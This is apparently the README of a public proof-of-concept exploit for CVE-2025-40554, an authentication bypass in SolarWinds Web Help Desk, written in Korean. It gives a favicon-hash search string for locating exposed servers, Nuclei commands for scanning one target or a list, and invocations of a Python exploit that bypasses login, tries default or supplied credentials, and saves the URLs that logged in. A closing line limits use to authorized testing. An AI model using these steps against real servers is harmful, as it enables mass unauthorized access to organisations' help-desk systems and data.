
CVE-2025-40554에 대한 개념 증명 익스플로잇, SolarWinds Web Help Desk의 인증 우회 취약점입니다. 단일 또는 배치 대상 테스트를 위한 Nuclei 템플릿 및 Python 익스플로잇을 포함하며 선택적 자격 증명 로그인이 가능합니다.
http.favicon.hash:"1895809524"
nuclei -u https://TARGET:8443 -t CVE-2025-40554.yaml
nuclei -l list_target.txt -t CVE-2025-40554.yaml
pip install -r requirements.txt
단일 대상 (우회 + 로그인, 기본 client/client):
python3 exploit_auth_bypass.py -t https://TARGET:8443
단일 대상, 사용자 정의 자격 증명 사용:
python3 exploit_auth_bypass.py -t https://TARGET:8443 -u myuser -p mypass
단일 대상, 우회만 (로그인 없음):
python3 exploit_auth_bypass.py -t https://TARGET:8443 --no-login
대상 목록 (취약 + 로그인만 저장):
python3 exploit_auth_bypass.py -l result_all.txt
python3 exploit_auth_bypass.py -l targets.txt -o my_login_ok.txt
대상 목록, 사용자 정의 자격 증명 사용:
python3 exploit_auth_bypass.py -l targets.txt -u admin -p secret
자동 모드 (로그인 성공한 URL만 출력):
python3 exploit_auth_bypass.py -l result_all.txt -q
이 PoC는 공인된 보안 연구 및 테스트 목적으로만 사용됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 저자는 오용에 대해 책임을 지지 않습니다.